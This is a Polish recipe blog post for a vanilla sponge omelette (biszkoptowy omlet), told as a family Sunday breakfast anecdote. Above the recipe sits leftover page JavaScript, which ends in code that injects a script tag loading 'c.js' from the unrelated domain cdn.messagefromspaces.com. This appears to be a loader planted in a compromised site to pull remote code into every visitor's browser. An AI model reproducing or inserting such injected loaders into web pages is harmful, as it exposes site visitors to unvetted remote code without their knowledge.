, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Waniliowy omlet biszkoptowy

Wydrukuj artykuł Wydrukuj artykuł

waniliowy omlet biszkoptowy

Na niedzielne śniadanie lubimy jeść omlety:) i zazwyczaj przygotowuje je Tata. Ostatniej niedzieli jednak przypadła Taty kolej… wylegiwania się do 9:00, więc Mama dzielnie wstała bladym świtem w ślad za małymi, brzęczącymi Bąblami i z uśmiechem dzień rozpoczęła.

Sen Taty zwłaszcza o poranku twardy jest, o tak!

Dlatego nie miałam oporów z uruchomieniem miksera, którego Igor się boi gdy włączam bieg 8. Zatem na biegu 6 ubiłam 3 białka. Gdy białka się ubijały…

…do drugiej miski wrzuciłam 3 żółtka, dodałam kubek mleka (około 200 ml) i przesiałam 125 g mąki tortowej. Dodałam jeszcze kopiastą łyżkę budyniu waniliowego w proszku (prosto z torebki) i łyżeczkę cukru waniliowego. Wszystko wymieszałam miotełką. Do gładkiej masy z żółtek dodałam ubitą na sztywna pianę i delikatnie wymieszałam łyżką.

Na 2 patelniach o średnicy ok. 20 cm rozgrzałam kapkę oleju i wyłożyłam delikatnie masę po połowie. Po wyłożeniu masy zmniejszyłam ogień do minimum i przykryłam niezbyt szczelnie pokrywką. Po kilku minutach przełożyłam omlety delikatnie na drugą stronę.

Niedługo potem pałaszowaliśmy je z genialną konfiturą truskawkową, przygotowaną zeszłego lata.

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony